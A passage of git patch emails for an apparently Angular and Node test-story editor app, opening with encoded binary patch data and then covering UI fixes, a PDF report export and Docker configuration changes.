zW{11ov7A>YJ57{mo9e+4W+|C{eSJ`oY|$mVn!W62%xYpZw37LRQ8SONkHsF7nLgco z*S=}5J3E$GElih9bUD{}u}Gv-S&6hOrOA2Y<;{t!xtb4;mS8T&WWLhU7&ukFdhg8U zr0CRhp#|(Ih7Hfl)=S~9+nbtLsJ`V?cu=v@+u_8ydmNbp8j{hYJL=cBk;Ly_*j8|6 z?$mOP8R^4^rk5v<3Pm1Ta+>dnl<5i7O@*79v$M0WE=#}GUiCt3cUVv57GW8D{GO!t zQJ0LY*@9PupOz)<*3(U+nklW2Nw_#5?b^b&tJisSk!_%ldwZVwW08ca!KK$%DNWtT z?X&rO&|JHw9tF8IG6{S4Y>4C;*m{FY4V~f?C`cVf?OE(1STKOu5bm$s;?XR6B$7We zjCbA>o%AH(NLLc6F7(7L&W?n$5z=!OciZ`(_P*q<95jfzn^#vPJLQeY?o5==)YRe1 z>)BQ2_xJh`eazZr6TM~Irkd@Ja;$31^j*bKq_=AC$>ZyNkDvCq+tWzONZ*$@@N0x0 zO*hf3S#x`0sxxM7eL{KxfhPicg-VgUvKzO8F?aq0GNkY_@9m4iiX}adkKfOS;+{R0 zo<98MK00}pGmok1VrxzhsriBnv(}pnpqxd56CVrTKKiO~ZAr@hHQ~2^Rmr?jeqa7p zgB3r2l3}at9Eq$-lAxf1SL@ZJd#ir&2pPOw!_^$_9Gd6eC0iZt7p9v&TYm@@n3M1_ zW9-_gmIU7wYL*L%pSbeOFxz&*u#XehY7jy5*zLl`*V}rsdTz4f;)RsvBm3PC#*2h0 zp=z6Ow2kX|%e(<)Q--Rd)Xp%Zlux5X^dvUe_MkSJWfRZ6kmmva@n zf9<1SgUZ_%(63k0?e20!4IG@!K7Zg^&rRIXkb&T+(e3;P(Ud^3P4`4L*)6%vCiaXU zpITRt*G010d@I+X_+j6+P3PK+qgPq%T}rlGx6iI~$SVKknyvHA)YE9rjf0{+y82ey zJ38cVc8NzY3bOUnE2DKnt#d^TTs?XX-3T(2sXc61(}!|=eJw^6In27VX;=bp?#0D{ zePh$-ZxfOpS($SRg4iNx`uY~e`ufN@n{~QQ3Erb+bkRaQ!rc0l)dC@ZVV@d{1IKqn zsxOn+wLZN_VwE2*=*cVjHX5Po+lUGY{tSKP|O)b66HYJTw8!J<5zIwj+ zFGI>B*)lk9e$Lk0Wv6<5Mj$6w+d8%Lm2$XMna})U&TU%MJ=m9gq5kz#=7{hGczSoygZc1PF{{wr9cmF*2M?}Y3c-elPPXg2Fj7@Li5x@_nodlqi9ZA z=#@k>oSC;i)s<$n(U)qyak&j;qZ>uT39X~erx{3MHQ+&IkWqmi?w)i~pcZ<(T@vd( zoQ*}J#zh!zT4*~n3zWW>FBPStq@skwED5Cf6VTdxC{14{XOfkH;rk|7DJ`@sgW*lW zVgmvKlme8MynJ1-cnu8=ERKLB5HKtW3_Zw`K@P-t(r3d>fHn-Mbc!#{n?dvPM8R#6 z9liV*T4*$@9EJ4H!`sa4_vSt6?^$5+fej>kWAREjtcM5o;~I3v5`R`B?>qFTHRv|1 z`y;FsmG0%|OQA0Dr+PAGf82x<<@fsDe!lMG!*QZusqRz{mMER275|CKrN(9!zt?~% zaG`m4kJn<6{fQ)l=KO)IPx=Ozj1TAIjf^vxDt)k4q3%nO__=(Vu+4797YAFu8MI~Q6*z2&Ugwzm55iNQXD^O!rYg}nw4bt zk9!3-<-}?VN7W!W5%JC#4Hac4jEcG=t2b(DM2xz+qZ$F{Oe7Kspf^qwlA)Kc2bpC~ zng`j1iuLw%8P@?5PSUe5)bql#~hMC9q*gtl_YzCBrk7)xdZ@YcwQ%Un-g5 zJB5O4{$6axT2M}82HAkjpt2gp5eOtajzmzm!K;(-sw5&&5l0~5K9cux zqB#eBO&VT4C{18=BO0BhKWID)tSM`%4@iNeJ8gV1p-|(?f<&f(A<)VGRHyNNvf2Vg z6j!pR3zg+R-cML0pY~^y0k4WvQ6myCcvUiMJ~`nvFzPBAsu*XglQI>j;zU#tLaH46XJK0u1UHk#K44vCui3r zT@zwpLc)`?>o22=@55n=>dD#x1+b1v(>6VzvW{7tE_!Bq5Ogwz|1Ft|m7d~gveW=R ze?ic&{^<}F@Om5B(;PG#`1#q!0~!tbH*MO_>gUi9(Dd>pz_)LImgc`l4?E9zU}t|f9wa1y0amXD-MMlF zU_}Kmh@|9?>gM1eq6wgj3&8MjfZ)Rr5fS7=k*^`B^ze>)?zF ze-i>2;O0#*GnuRaOZ?~f`ZZ{$un-^~4-gQH=pP${b0Mg)5#ZFR0KXppRsH# zl$V3_x5uCB|5530@6mfnFykd9kr@uMzeK=?{EZu7Nhb68bAaDEpnlemY~gyRSigRT zQB4h?pddgvhV%a%-@OC*IXM8oJ^t4I{ikx@-lNYXfgz-&5kttxzyeI>(xm_i1b}e- zF+m~lH{w}xPoDz((f|XOn|Nes*7y^aT(t=IV+M1C8H^yXUWdYRH1qjC<8)C~AknZULhztlJzGVDo2~4Jz z7AOb%D<;#?5u{I^1elfvkVpgw#}IV*FhC9tfD@0A{`_d1XwSwy?#GqJ#>3saSS*}t zWi>JaV@C&gI6{z@7o3J5Gc$ll92yGV#l`~c>;za<1u!fO;KPRiO-ukTUk(u2=-#^r z(qLDVnF&(s*8@ac5J>$S;;$}c6BBqPC@N}e!#kdw9N;<@EI{_@si}a5&%Ls#Dah~c z1_&Oy5M*u+(i$27xw!#eya*7uIta40h10-6K@iw00g3O6k(vK}wZFX zRs>?0i4F+Si{Q^99?>_^{(jW}NWIw8_-~In{{I0Y9^BJ&%^FzJ z(^FU&MlLRWeHdAPT0RwEZ7slq2LVzj01+2-{yaz{t_gWo@bG~AloWvAE{OHV=s1w( zmYG?pBb0)yA#ZMh9Sgwy}5&XXZUz7dEmm}VI z*DiZ|xU<8jnYIDmYa$ znR$7zB$IjL2Ee#DfD0A?gkuP5ZU%^Kd_n486iY~e!R*`#aA*j)4JH%0r$O#*kb9gz zCmuMfKO+X*Hz9_=V8FY^MzA&gaPNfNLm~P>TgWQAejTKdiSlQf{wwq3 Date: Sat, 5 Nov 2022 11:33:08 +0100 Subject: [PATCH 17/50] Delete Bags --- .../src/app/scenario-editor/scenario-editor.component.html | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/frontend/src/app/scenario-editor/scenario-editor.component.html b/frontend/src/app/scenario-editor/scenario-editor.component.html index 5f921d7e8..ec172c814 100644 --- a/frontend/src/app/scenario-editor/scenario-editor.component.html +++ b/frontend/src/app/scenario-editor/scenario-editor.component.html @@ -37,11 +37,11 @@ assignee github avatar assignee github avatar diff --git a/frontend/src/app/stories-bar/stories-bar.component.ts b/frontend/src/app/stories-bar/stories-bar.component.ts index 10abb0c6b..1641e31a6 100644 --- a/frontend/src/app/stories-bar/stories-bar.component.ts +++ b/frontend/src/app/stories-bar/stories-bar.component.ts @@ -12,7 +12,7 @@ import { CreateNewGroupComponent } from '../modals/create-new-group/create-new-g import { CreateNewStoryComponent } from '../modals/create-new-story/create-new-story.component'; import { UpdateGroupComponent } from '../modals/update-group/update-group.component'; import { CreateScenarioComponent } from '../modals/create-scenario/create-scenario.component'; - +import { RepositoryContainer } from 'src/app/model/RepositoryContainer'; /** * Component of the Stories bar @@ -656,5 +656,12 @@ export class StoriesBarComponent implements OnInit, OnDestroy { }) } + toTicket(story: string){ + const value = localStorage.getItem('repository'); + const _id = localStorage.getItem('id'); + const source = localStorage.getItem('source'); + const repositoryContainer: RepositoryContainer = {value, source, _id}; + this.apiService.goToTicket(story, repositoryContainer); + } } From 6763b5604c2e5957c346663b8b0a5de5917e4fa9 Mon Sep 17 00:00:00 2001 From: Nataliia Karmazina Date: Mon, 7 Nov 2022 18:47:27 +0100 Subject: [PATCH 20/50] delete duplicate --- .../stories-bar/stories-bar.component.html | 114 +++++------------- 1 file changed, 33 insertions(+), 81 deletions(-) diff --git a/frontend/src/app/stories-bar/stories-bar.component.html b/frontend/src/app/stories-bar/stories-bar.component.html index c4831462c..6bc91bf5e 100644 --- a/frontend/src/app/stories-bar/stories-bar.component.html +++ b/frontend/src/app/stories-bar/stories-bar.component.html @@ -14,7 +14,7 @@
      -
      +
      search @@ -52,79 +52,27 @@ - Group - - -- - - {{group}} - - - -
      -
      - -
      - -
      -
      -
      - - - - folder_open - - -
      -
      -
      - -
      -
    From 4d6267b0204fbc829f713256bd8c36882667d829 Mon Sep 17 00:00:00 2001 From: Nataliia Karmazina Date: Thu, 10 Nov 2022 13:39:12 +0100 Subject: [PATCH 21/50] Fixed length storyTitle --- frontend/src/app/stories-bar/stories-bar.component.css | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/frontend/src/app/stories-bar/stories-bar.component.css b/frontend/src/app/stories-bar/stories-bar.component.css index 97400a2cb..11e4e1221 100644 --- a/frontend/src/app/stories-bar/stories-bar.component.css +++ b/frontend/src/app/stories-bar/stories-bar.component.css @@ -111,7 +111,7 @@ li{ a.storyListLink { transition: 0.2s; display: inline-block; - max-width: 77%; + max-width: 63%; white-space: nowrap; overflow: hidden; text-overflow: ellipsis; From d543132e6fdd677d3abdd1faf03fbdc3c7adc8ee Mon Sep 17 00:00:00 2001 From: i3rotlher Date: Thu, 10 Nov 2022 16:28:04 +0100 Subject: [PATCH 22/50] docker works again --- backend/.dockerignore | 1 + backend/Dockerfile | 14 ++++---------- docker-compose.yml | 4 ++-- 3 files changed, 7 insertions(+), 12 deletions(-) create mode 100644 backend/.dockerignore diff --git a/backend/.dockerignore b/backend/.dockerignore new file mode 100644 index 000000000..98599dffd --- /dev/null +++ b/backend/.dockerignore @@ -0,0 +1 @@ +*node_modules \ No newline at end of file diff --git a/backend/Dockerfile b/backend/Dockerfile index cb9296caf..972161c3f 100644 --- a/backend/Dockerfile +++ b/backend/Dockerfile @@ -6,15 +6,6 @@ RUN yes | apt-get install wget # Create app directory WORKDIR /usr/src/app -# Install app dependencies -# A wildcard is used to ensure both package.json AND package-lock.json are copied -# where available (npm@5+) -COPY package*.json ./ - -RUN npm install -# If you are building your code for production -# RUN npm ci --only=production - # install chrome RUN wget https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb RUN yes | apt install ./google-chrome-stable_current_amd64.deb @@ -49,10 +40,13 @@ RUN unzip /tmp/msedgedriver.zip msedgedriver -d /usr/local/bin/ RUN rm -f latest_stable_with_weird_chars.txt RUN rm -f latest_stable.txt - # Bundle app source COPY . . +RUN npm install +# If you are building your code for production +# RUN npm ci --only=production + EXPOSE 8080 # Start dbus-daemon for google-chrome diff --git a/docker-compose.yml b/docker-compose.yml index 0d9ea67ab..b97322edc 100644 --- a/docker-compose.yml +++ b/docker-compose.yml @@ -5,14 +5,14 @@ services: build: ./backend ports: - - "${BACKENDPORT}:8080" + - "${BACKENDPORT}:${BACKENDPORT}" container_name: "Seed-backend" frontend: build: ./frontend ports: - - "${FRONTENDPORT}:4200" + - "${FRONTENDPORT}:${FRONTENDPORT}" container_name: "Seed-frontend" depends_on: - backend From 01cc0978036e4b58ff797deaa100312537ef6b34 Mon Sep 17 00:00:00 2001 From: Nataliia Karmazina Date: Fri, 11 Nov 2022 12:03:12 +0100 Subject: [PATCH 23/50] Skrolling strories, steps --- frontend/src/app/stories-bar/stories-bar.component.html | 2 +- frontend/src/app/story-editor/story-editor.component.html | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/frontend/src/app/stories-bar/stories-bar.component.html b/frontend/src/app/stories-bar/stories-bar.component.html index 86eee4f0c..81c3d0889 100644 --- a/frontend/src/app/stories-bar/stories-bar.component.html +++ b/frontend/src/app/stories-bar/stories-bar.component.html @@ -1,4 +1,4 @@ -
    +

    diff --git a/frontend/src/app/story-editor/story-editor.component.html b/frontend/src/app/story-editor/story-editor.component.html index 19fcecf43..1c615f804 100644 --- a/frontend/src/app/story-editor/story-editor.component.html +++ b/frontend/src/app/story-editor/story-editor.component.html @@ -33,7 +33,7 @@

    You are not authorized to use this project

    -
    +
    Story From 5657eff91cb3416d8a124abb06756886b30e47e6 Mon Sep 17 00:00:00 2001 From: Nataliia Karmazina Date: Tue, 15 Nov 2022 16:25:20 +0100 Subject: [PATCH 24/50] Add new SaveButton to background --- frontend/src/app/story-editor/story-editor.component.css | 7 ++++++- .../src/app/story-editor/story-editor.component.html | 9 +++++++-- 2 files changed, 13 insertions(+), 3 deletions(-) diff --git a/frontend/src/app/story-editor/story-editor.component.css b/frontend/src/app/story-editor/story-editor.component.css index b329897ab..20927bb87 100644 --- a/frontend/src/app/story-editor/story-editor.component.css +++ b/frontend/src/app/story-editor/story-editor.component.css @@ -351,11 +351,16 @@ text-align: center; margin: 0px auto; margin-right: 2px; } - + .storyTitle > em { color: var(--ocean-blue); } + .storyTitle > .mat-icons { + transform: translateY(-8px); + width: 25px; + } + /* Eventually not in use */ .backgroundTitleContainer { display: grid; diff --git a/frontend/src/app/story-editor/story-editor.component.html b/frontend/src/app/story-editor/story-editor.component.html index 19fcecf43..3c030e4c9 100644 --- a/frontend/src/app/story-editor/story-editor.component.html +++ b/frontend/src/app/story-editor/story-editor.component.html @@ -107,10 +107,15 @@

    You are not authorized to use this project

    - + assignee github avatar From 49ad78c144922fe0c7dcfabadad72dd7f378706c Mon Sep 17 00:00:00 2001 From: Alice-cla Date: Wed, 16 Nov 2022 18:14:34 +0100 Subject: [PATCH 27/50] css update after merge --- frontend/src/app/base-editor/base-editor.component.css | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/frontend/src/app/base-editor/base-editor.component.css b/frontend/src/app/base-editor/base-editor.component.css index e574b1944..e0084fd4d 100644 --- a/frontend/src/app/base-editor/base-editor.component.css +++ b/frontend/src/app/base-editor/base-editor.component.css @@ -371,8 +371,10 @@ input[type="text"]{ } input.scenario, input.background { - padding-left: 10px; - padding-right: 10px; + margin-left: 10px; + margin-right: 10px; + padding-left: 5px; + padding-right: 5px; } \ No newline at end of file From f8230a86fe55c833102a7e20de22ab2790208869 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?K=C3=B6hler=2C=20Jonathan?= Date: Wed, 16 Nov 2022 21:06:04 +0100 Subject: [PATCH 28/50] keep immutable _id as ObjectId --- backend/src/database/DbServices.js | 1 + 1 file changed, 1 insertion(+) diff --git a/backend/src/database/DbServices.js b/backend/src/database/DbServices.js index 5c803bdf6..4acfdb89b 100644 --- a/backend/src/database/DbServices.js +++ b/backend/src/database/DbServices.js @@ -292,6 +292,7 @@ async function updateStory(updatedStory) { try { const db = dbConnection.getConnection(); const collection = await db.collection(storiesCollection); + updatedStory._id = ObjectId(updatedStory._id.toString()) return await collection.findOneAndReplace({_id: ObjectId(updatedStory._id.toString())}, updatedStory, {returnDocument: "after"}) } catch (e) { console.log(`ERROR updateStory: ${e}`); From b126fa2320d70b935e1a39762c32f07892eede08 Mon Sep 17 00:00:00 2001 From: NessArt Date: Thu, 17 Nov 2022 23:25:57 +0100 Subject: [PATCH 29/50] bug fix --- frontend/src/app/base-editor/base-editor.component.ts | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/frontend/src/app/base-editor/base-editor.component.ts b/frontend/src/app/base-editor/base-editor.component.ts index 8f61ff6e8..11bc36785 100644 --- a/frontend/src/app/base-editor/base-editor.component.ts +++ b/frontend/src/app/base-editor/base-editor.component.ts @@ -677,7 +677,7 @@ export class BaseEditorComponent { switch(this.templateName) { case 'background': //return stepDefs.when[j].checked; - this.returnCheckedValue(stepDefs, i, j); + return this.returnCheckedValue(stepDefs, i, j); case 'scenario': /* if (i === 0) { @@ -688,7 +688,7 @@ export class BaseEditorComponent { return stepDefs.then[j].checked; } return false; */ - this.returnCheckedValue(stepDefs, i, j); + return this.returnCheckedValue(stepDefs, i, j); } } From c29dde2f93423c662a83443f710aaebb74cdd4cf Mon Sep 17 00:00:00 2001 From: NessArt Date: Thu, 17 Nov 2022 23:38:33 +0100 Subject: [PATCH 30/50] disable drag&drop for unchecked steps --- frontend/src/app/base-editor/base-editor.component.css | 4 ++++ frontend/src/app/base-editor/base-editor.component.html | 8 ++++---- 2 files changed, 8 insertions(+), 4 deletions(-) diff --git a/frontend/src/app/base-editor/base-editor.component.css b/frontend/src/app/base-editor/base-editor.component.css index 1c68f9b23..c36a4f3d1 100644 --- a/frontend/src/app/base-editor/base-editor.component.css +++ b/frontend/src/app/base-editor/base-editor.component.css @@ -82,6 +82,10 @@ em.dragIcon{ margin-top:1px; } +em.dragIcon.dragDisabled{ + color: grey !important; +} + .text-inline{ display: flex; } diff --git a/frontend/src/app/base-editor/base-editor.component.html b/frontend/src/app/base-editor/base-editor.component.html index 8c5c3f33e..31af9d4ba 100644 --- a/frontend/src/app/base-editor/base-editor.component.html +++ b/frontend/src/app/base-editor/base-editor.component.html @@ -71,8 +71,8 @@
    -
    - drag_indicator +
    + drag_indicator
    @@ -227,8 +227,8 @@
    -
    - drag_indicator +
    + drag_indicator
    From 9835024d3964cca3985bededd87595bb60bebda5 Mon Sep 17 00:00:00 2001 From: NessArt Date: Fri, 18 Nov 2022 00:09:25 +0100 Subject: [PATCH 31/50] bug fix --- frontend/src/app/base-editor/base-editor.component.ts | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/frontend/src/app/base-editor/base-editor.component.ts b/frontend/src/app/base-editor/base-editor.component.ts index 11bc36785..4ace018a7 100644 --- a/frontend/src/app/base-editor/base-editor.component.ts +++ b/frontend/src/app/base-editor/base-editor.component.ts @@ -535,10 +535,11 @@ export class BaseEditorComponent { indices.forEach((element) => { middleOfList.push(element.value) }); + let startOfListFiltered = startOfList.filter( ( el ) => !middleOfList.includes( el ) ); let endOfListFiltered = endOfList.filter( ( el ) => !middleOfList.includes( el ) ); - startOfList.push(...middleOfList) - startOfList.push(...endOfListFiltered) - newList = startOfList + startOfListFiltered.push(...middleOfList) + startOfListFiltered.push(...endOfListFiltered) + newList = startOfListFiltered } else { newList = this.getStepsList(stepDefs, stepIndex) @@ -625,7 +626,6 @@ export class BaseEditorComponent { } */ break; } - event.source.data = { indices, values: indices.map(a => a.index), From 9277e3f52b4352dd0545b5005e6eccb467bbdd15 Mon Sep 17 00:00:00 2001 From: NessArt Date: Fri, 18 Nov 2022 00:11:53 +0100 Subject: [PATCH 32/50] enable drag&drop when unchecked --- frontend/src/app/base-editor/base-editor.component.css | 4 ---- frontend/src/app/base-editor/base-editor.component.html | 8 ++++---- 2 files changed, 4 insertions(+), 8 deletions(-) diff --git a/frontend/src/app/base-editor/base-editor.component.css b/frontend/src/app/base-editor/base-editor.component.css index c36a4f3d1..1c68f9b23 100644 --- a/frontend/src/app/base-editor/base-editor.component.css +++ b/frontend/src/app/base-editor/base-editor.component.css @@ -82,10 +82,6 @@ em.dragIcon{ margin-top:1px; } -em.dragIcon.dragDisabled{ - color: grey !important; -} - .text-inline{ display: flex; } diff --git a/frontend/src/app/base-editor/base-editor.component.html b/frontend/src/app/base-editor/base-editor.component.html index 31af9d4ba..42d5e0169 100644 --- a/frontend/src/app/base-editor/base-editor.component.html +++ b/frontend/src/app/base-editor/base-editor.component.html @@ -71,8 +71,8 @@
    -
    - drag_indicator +
    + drag_indicator
    @@ -227,8 +227,8 @@
    -
    - drag_indicator +
    + drag_indicator
    From 7a127f99e6a519ae98cec4dd6aa3dac7a88d6659 Mon Sep 17 00:00:00 2001 From: NessArt Date: Fri, 18 Nov 2022 00:49:11 +0100 Subject: [PATCH 33/50] redirect user to login when story error --- frontend/src/app/story-editor/story-editor.component.ts | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/frontend/src/app/story-editor/story-editor.component.ts b/frontend/src/app/story-editor/story-editor.component.ts index 5371491fa..d84d8c3c7 100644 --- a/frontend/src/app/story-editor/story-editor.component.ts +++ b/frontend/src/app/story-editor/story-editor.component.ts @@ -1,3 +1,4 @@ +import { Router } from '@angular/router'; import {Component, OnInit, Input, ViewChild, EventEmitter, Output, OnDestroy} from '@angular/core'; import { ApiService } from '../Services/api.service'; import { Story } from '../model/Story'; @@ -246,7 +247,8 @@ export class StoryEditorComponent implements OnInit, OnDestroy { constructor( public apiService: ApiService, public toastr: ToastrService, - public themeService: ThemingService + public themeService: ThemingService, + public router: Router ) { if (this.apiService.urlReceived) { this.loadStepTypes(); @@ -315,6 +317,8 @@ export class StoryEditorComponent implements OnInit, OnDestroy { this.storiesError = true; this.showEditor = false; + window.localStorage.removeItem('login') + this.router.navigate(['/login']); }); this.deleteScenarioObservable = this.apiService.deleteScenarioEvent.subscribe(() => { From 93f98a434169f05e9702cc887ed96b97875d2086 Mon Sep 17 00:00:00 2001 From: NessArt Date: Fri, 18 Nov 2022 01:19:07 +0100 Subject: [PATCH 34/50] line through deactivated multiple scenario --- frontend/src/app/example-table/example-table.component.css | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/frontend/src/app/example-table/example-table.component.css b/frontend/src/app/example-table/example-table.component.css index 4240413f0..5f3523c65 100644 --- a/frontend/src/app/example-table/example-table.component.css +++ b/frontend/src/app/example-table/example-table.component.css @@ -6,6 +6,10 @@ table { .deactivated{ color: gray; font-style: italic; + text-decoration: line-through; +} +.deactivated .numbering{ + text-decoration: line-through; } .valueRow{ From a2647f2511388862be3bdcd351ae2b4d54d6a4ff Mon Sep 17 00:00:00 2001 From: NessArt Date: Fri, 18 Nov 2022 01:27:00 +0100 Subject: [PATCH 35/50] remove code smell --- frontend/src/app/login/login.component.ts | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/frontend/src/app/login/login.component.ts b/frontend/src/app/login/login.component.ts index 560e6065e..4247fa5c2 100644 --- a/frontend/src/app/login/login.component.ts +++ b/frontend/src/app/login/login.component.ts @@ -125,7 +125,7 @@ export class LoginComponent implements OnInit, AfterViewInit { this.themeObservable = this.themeService.themeChanged.subscribe((_) => { this.isDark = this.themeService.isDarkMode(); }); - if((!!localStorage.getItem('login'))==true){ + if((!!localStorage.getItem('login'))){ if(localStorage.getItem('repository')){ this.router.navigate(['/']) } From 4f9c627f87d36ce10ecb33d025561903a70e49ab Mon Sep 17 00:00:00 2001 From: i3rotlher Date: Fri, 18 Nov 2022 16:08:13 +0100 Subject: [PATCH 36/50] urlRecieved reworked --- frontend/src/app/Services/api.service.ts | 4 +++- frontend/src/app/story-editor/story-editor.component.ts | 5 ++--- 2 files changed, 5 insertions(+), 4 deletions(-) diff --git a/frontend/src/app/Services/api.service.ts b/frontend/src/app/Services/api.service.ts index 645bb30f4..d93beb204 100644 --- a/frontend/src/app/Services/api.service.ts +++ b/frontend/src/app/Services/api.service.ts @@ -37,7 +37,7 @@ export class ApiService { /** * If the backend url was received */ - public urlReceived = false; + public urlReceived = localStorage.getItem('url_backend') && localStorage.getItem('url_backend') !== 'undefined'; /** * Event Emitter if the stories could not be retrieved @@ -760,6 +760,8 @@ export class ApiService { const chromium_emulators = localStorage.getItem('chromium_emulators') const edge_emulators = localStorage.getItem('edge_emulators') + console.log("GET BACKEND INFO"); + if (url && url !== 'undefined' && clientId && clientId !== 'undefined' && version && version !== 'undefined' && diff --git a/frontend/src/app/story-editor/story-editor.component.ts b/frontend/src/app/story-editor/story-editor.component.ts index caa2edc41..59d6f9739 100644 --- a/frontend/src/app/story-editor/story-editor.component.ts +++ b/frontend/src/app/story-editor/story-editor.component.ts @@ -251,7 +251,6 @@ export class StoryEditorComponent implements OnInit, OnDestroy { if (this.apiService.urlReceived) { this.loadStepTypes(); } - this.loadStepTypes() if (this.selectedStory) { this.storiesLoaded = true; @@ -340,8 +339,8 @@ export class StoryEditorComponent implements OnInit, OnDestroy { this.isDark = this.themeService.isDarkMode(); }); - this.getBackendUrlObservable = this.apiService.getBackendUrlEvent.subscribe(() => { - this.loadStepTypes(); + this.getBackendUrlObservable = this.apiService.getBackendUrlEvent.subscribe(() => { + this.loadStepTypes(); }); this.renameBackgroundObservable = this.apiService.renameBackgroundEvent.subscribe((newName) => { From dee23a5ba34a5212770f33e39e2488be2860ffac Mon Sep 17 00:00:00 2001 From: Nataliia Karmazina Date: Sun, 20 Nov 2022 17:25:00 +0100 Subject: [PATCH 37/50] New pdf report --- frontend/src/app/report/report.component.ts | 32 +++++++++++++++------ 1 file changed, 23 insertions(+), 9 deletions(-) diff --git a/frontend/src/app/report/report.component.ts b/frontend/src/app/report/report.component.ts index bca3283cf..f733fd6a9 100644 --- a/frontend/src/app/report/report.component.ts +++ b/frontend/src/app/report/report.component.ts @@ -28,6 +28,9 @@ export class ReportComponent implements OnInit { reportIsSaved; + counter: number; + + length: number; /** * html report of the result */ @@ -143,24 +146,35 @@ export class ReportComponent implements OnInit { public exportHtmlToPDF(){ const iframe = this.iframe.nativeElement; const body = iframe.contentWindow.document.getElementsByTagName('body')[0]; - - let divEl = iframe.contentWindow.document.getElementsByClassName('panel-collapse'); - for (let element of divEl) { + let divEl = iframe.contentWindow.document.querySelectorAll(`[id^="collapseFeature"]`); + for (let element of divEl) { element.classList.add("in"); } - html2canvas(body).then(canvas => { + html2canvas(body).then(canvas => { - let docWidth = 208; - let docHeight = canvas.height * docWidth / canvas.width; + var imgData = canvas.toDataURL("image/jpeg", 1.0); + var margin = 2; + var imgWidth = 210 - 2*margin; + var pageHeight = 295; + var imgHeight = canvas.height * imgWidth / canvas.width-10; + var heightLeft = imgHeight; - const contentDataURL = canvas.toDataURL('image/png') let doc = new jsPDF('p', 'mm', 'a4'); let position = 0; - doc.addImage(contentDataURL, 'PNG', 0, position, docWidth, docHeight); + doc.addImage(imgData, 'PNG', 0, 12, imgWidth, imgHeight); + + heightLeft -= pageHeight; + + while (heightLeft >= 0) { + position = heightLeft - imgHeight; + doc.addPage(); + doc.addImage(imgData, 'PNG', 0, position+12, imgWidth, imgHeight); + heightLeft -= pageHeight; + } doc.save(this.reportId+ '.pdf'); - }) + }); } } From 9906952e8eb102a31d10d25e1e546f5247e59b36 Mon Sep 17 00:00:00 2001 From: Beyza Cavus Date: Wed, 23 Nov 2022 11:44:20 +0100 Subject: [PATCH 38/50] fixed dark appearance example list option --- frontend/src/app/base-editor/base-editor.component.css | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/frontend/src/app/base-editor/base-editor.component.css b/frontend/src/app/base-editor/base-editor.component.css index 1c68f9b23..ab79459a8 100644 --- a/frontend/src/app/base-editor/base-editor.component.css +++ b/frontend/src/app/base-editor/base-editor.component.css @@ -303,6 +303,10 @@ input[type="text"]{ .darkTheme ::ng-deep .exampleList .mat-select-value { font-weight: 595 !important; } + +::ng-deep .darkTheme .exampleListOption { + font-weight: 595 !important; +} .exampleList ::ng-deep .mat-form-field-infix { width: fit-content !important; From 16674c7ef125b5725ecf71caf225b4e35f8ab049 Mon Sep 17 00:00:00 2001 From: i3rotlher Date: Wed, 23 Nov 2022 13:56:28 +0100 Subject: [PATCH 39/50] no more empty steps, yay --- frontend/src/app/Services/api.service.ts | 3 +-- frontend/src/app/story-editor/story-editor.component.ts | 4 +++- 2 files changed, 4 insertions(+), 3 deletions(-) diff --git a/frontend/src/app/Services/api.service.ts b/frontend/src/app/Services/api.service.ts index d93beb204..76acf551c 100644 --- a/frontend/src/app/Services/api.service.ts +++ b/frontend/src/app/Services/api.service.ts @@ -760,8 +760,6 @@ export class ApiService { const chromium_emulators = localStorage.getItem('chromium_emulators') const edge_emulators = localStorage.getItem('edge_emulators') - console.log("GET BACKEND INFO"); - if (url && url !== 'undefined' && clientId && clientId !== 'undefined' && version && version !== 'undefined' && @@ -788,6 +786,7 @@ export class ApiService { localStorage.setItem('gecko_emulators', backendInfo.gecko_emulators) localStorage.setItem('chromium_emulators', backendInfo.chromium_emulators) localStorage.setItem('edge_emulators', backendInfo.edge_emulators) + this.urlReceived = true; this.getBackendUrlEvent.emit(); }); } diff --git a/frontend/src/app/story-editor/story-editor.component.ts b/frontend/src/app/story-editor/story-editor.component.ts index 59d6f9739..a5c216608 100644 --- a/frontend/src/app/story-editor/story-editor.component.ts +++ b/frontend/src/app/story-editor/story-editor.component.ts @@ -250,7 +250,9 @@ export class StoryEditorComponent implements OnInit, OnDestroy { ) { if (this.apiService.urlReceived) { this.loadStepTypes(); - } + } else { + this.apiService.getBackendInfo(); + } if (this.selectedStory) { this.storiesLoaded = true; From 8eced3627ebe73c9efddaa32ef7f6577fdfe67bc Mon Sep 17 00:00:00 2001 From: Nataliia Karmazina Date: Wed, 23 Nov 2022 16:09:25 +0100 Subject: [PATCH 40/50] Width Preview Block --- .../app/modals/add-block-form/add-block-form.component.css | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/frontend/src/app/modals/add-block-form/add-block-form.component.css b/frontend/src/app/modals/add-block-form/add-block-form.component.css index 52ba777f2..a53b6a797 100644 --- a/frontend/src/app/modals/add-block-form/add-block-form.component.css +++ b/frontend/src/app/modals/add-block-form/add-block-form.component.css @@ -105,6 +105,6 @@ td.mat-cell:first-of-type, td.mat-footer-cell:first-of-type{ } ::ng-deep .modal-content{ - width: 110%; - transform: translate(-3%, 0); + width: 140%; + transform: translate(-11%, 0); } From dfd7dbb6064f4dcc0e1a31a38879af7bfd9ae12f Mon Sep 17 00:00:00 2001 From: Nataliia Karmazina Date: Wed, 23 Nov 2022 16:16:45 +0100 Subject: [PATCH 41/50] Width Preview Block --- .../src/app/modals/add-block-form/add-block-form.component.css | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/frontend/src/app/modals/add-block-form/add-block-form.component.css b/frontend/src/app/modals/add-block-form/add-block-form.component.css index a53b6a797..42af4c467 100644 --- a/frontend/src/app/modals/add-block-form/add-block-form.component.css +++ b/frontend/src/app/modals/add-block-form/add-block-form.component.css @@ -106,5 +106,5 @@ td.mat-cell:first-of-type, td.mat-footer-cell:first-of-type{ } ::ng-deep .modal-content{ 